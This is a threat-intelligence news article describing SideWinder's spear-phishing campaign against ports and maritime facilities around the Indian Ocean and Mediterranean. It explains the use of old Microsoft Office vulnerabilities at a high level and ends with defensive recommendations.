TLDR
- SideWinder, a nation-state threat actor believed to be affiliated with India, is conducting a new cyber espionage campaign.
- The campaign targets ports and maritime facilities in countries around the Indian Ocean and Mediterranean Sea.
- Attackers use spear-phishing emails with malicious Microsoft Word documents as the initial attack vector.
- The attack exploits old vulnerabilities in Microsoft Office (CVE-2017-0199 and CVE-2017-11882) to deliver malware.
- Targeted countries include Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
A new cyber espionage campaign targeting maritime facilities in multiple countries has been uncovered by security researchers. The campaign, attributed to a group known as SideWinder, is believed to be affiliated with India and has been active since 2012.
The BlackBerry Research and Intelligence Team discovered that SideWinder is targeting ports and maritime facilities in countries around the Indian Ocean and Mediterranean Sea. The affected countries include Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
SideWinder, also known by other names such as APT-C-17 and Razor Tiger, uses spear-phishing emails as its main attack method. These emails contain malicious Microsoft Word documents designed to trick recipients into opening them. The attackers use emotionally charged topics like sexual harassment, employee termination, and salary cuts to increase the chances of victims opening the attachments.
When a victim opens the malicious document, it exploits an old security flaw (CVE-2017-0199) in Microsoft Office. This vulnerability, which was patched in 2017, allows the document to connect to a malicious website controlled by the attackers. The website is disguised to look like it belongs to Pakistan’s Directorate General Ports and Shipping.
The attack then proceeds to download another malicious file that exploits another old vulnerability (CVE-2017-11882) in the Microsoft Office Equation Editor. This leads to the execution of malicious code on the victim’s computer.
The attackers have taken steps to avoid detection. Their malware checks if it’s running on a real computer or in a virtual environment used by security researchers. If it determines the system is of interest, it proceeds to download and run additional malicious code.
While the exact nature of the final payload isn’t known, researchers believe the goal is likely intelligence gathering. This fits with SideWinder’s previous campaigns, which have focused on espionage.
The use of old vulnerabilities in this campaign highlights the importance of keeping software up to date. Many organizations still use older versions of Microsoft Office, which makes them vulnerable to these kinds of attacks.
To protect against such threats, security experts recommend several measures:
- Keep all software, especially Microsoft Office, updated with the latest security patches.
- Train employees to recognize and report phishing attempts.
- Use advanced email filtering solutions to block malicious emails.
- Implement real-time threat detection and response systems.
The maritime industry, which plays a crucial role in global trade, appears to be a particular target in this campaign. This could be due to the strategic importance of shipping and port facilities to national economies and security.